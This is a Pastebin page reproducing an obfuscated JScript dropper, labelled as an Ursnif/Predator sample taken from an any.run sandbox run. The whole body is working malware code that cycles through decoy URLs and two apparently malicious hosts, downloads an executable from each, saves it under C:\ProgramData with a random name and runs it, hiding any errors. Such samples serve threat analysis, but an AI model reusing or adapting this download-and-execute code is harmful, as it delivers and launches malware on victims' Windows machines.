Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #ursnif #predator dropper
- // from https://app.any.run/tasks/f6eec462-6b4c-43a8-89ce-0749f0a2a77e/
- var c81a84500ed1b00245d5915b6f378c4b9 = ['https://docs.microsoft.com/en-us/aspnet/index/404', 'https://docs.microsoft.com/en-us/office/index/404', 'https://www.trendmicro.com/de_de/404.html', '4IGng/0ZfL57M', '', 'http://sogrospina.com/angosz/cecolf.php?l=allix1.tar', 'http://thachastew.com/Lwos.php'];
- function c5e48828ccea2a557e05addda6e8a356c(c920de1499def1eaca0fc3daa89faaf36){
- try{
- var c06366560112cb267da2b804c02434d31 = WScript.CreateObject('MSXML2.XMLHTTP');
- c06366560112cb267da2b804c02434d31.Open('GET', c920de1499def1eaca0fc3daa89faaf36, false);
- c06366560112cb267da2b804c02434d31.Send();
- var ccb2ed58980ab60a3e21e23f385a6a6dd = Math.round(Math.random() * 103);
- if (c06366560112cb267da2b804c02434d31.Status == 200)
- {
- var cedd9f28b97948c82c3a1374834be6825 = WScript.CreateObject('ADODB.Stream');
- cedd9f28b97948c82c3a1374834be6825.Open();
- cedd9f28b97948c82c3a1374834be6825.Type = 1;
- cedd9f28b97948c82c3a1374834be6825.Write(c06366560112cb267da2b804c02434d31.ResponseBody);
- cedd9f28b97948c82c3a1374834be6825.Position = 0;
- var cab6a85a7de6f8c8b456daa68bd3d4961 = WScript.CreateObject('Scripting.FileSystemObject');
- if (cab6a85a7de6f8c8b456daa68bd3d4961.FileExists('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe'))
- {
- cab6a85a7de6f8c8b456daa68bd3d4961.DeleteFile('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe');
- }
- cedd9f28b97948c82c3a1374834be6825.SaveToFile('C:\\ProgramData\\204' + ccb2ed58980ab60a3e21e23f385a6a6dd + '.exe', 2);
- cedd9f28b97948c82c3a1374834be6825.Close();
- (new ActiveXObject("Shell.Application").Open("C:\\ProgramData\\204" + ccb2ed58980ab60a3e21e23f385a6a6dd + ".exe"));
- }
- }catch(e){}
- }
- for(var cd62a3ae55404f7d993846e953694ff01 = 0; cd62a3ae55404f7d993846e953694ff01 < c81a84500ed1b00245d5915b6f378c4b9.length; cd62a3ae55404f7d993846e953694ff01++){
- var c66d5f0ffe276525f3b2df450f48f1d96 = function() {c5e48828ccea2a557e05addda6e8a356c(c81a84500ed1b00245d5915b6f378c4b9[cd62a3ae55404f7d993846e953694ff01])};
- c66d5f0ffe276525f3b2df450f48f1d96();
- WScript.Sleep(4603);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement